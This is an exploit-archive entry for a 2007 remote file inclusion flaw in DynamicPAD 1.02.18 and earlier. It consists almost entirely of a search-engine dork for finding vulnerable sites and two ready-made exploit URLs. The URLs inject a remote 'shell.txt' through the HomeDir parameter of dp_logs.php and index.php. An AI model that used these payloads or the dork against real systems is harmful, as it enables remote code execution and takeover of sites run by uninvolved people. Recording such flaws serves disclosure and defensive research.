id: 1844
date: 05/06/2007
title: DynamicPAD <= 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities
author: ThE TiGeR
cves: 

=====================================================================
DynamicPAD <= 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities
=====================================================================


#DynamicPAD Remote file inclusion (HomeDir)

#Download script : http://dynamicpad.org/dp.tar.gz

#Dork : "Powered By DynamicPAD"

#Exploit :

#http://victim.com/[dp_path]/dp_logs.php?HomeDir=shell.txt?

#http://victom.com/[dp_path]/index.php?HomeDir= shell.txt?

#Discovered by : ThE TiGeR



#  0day.today [2023-03-23]  #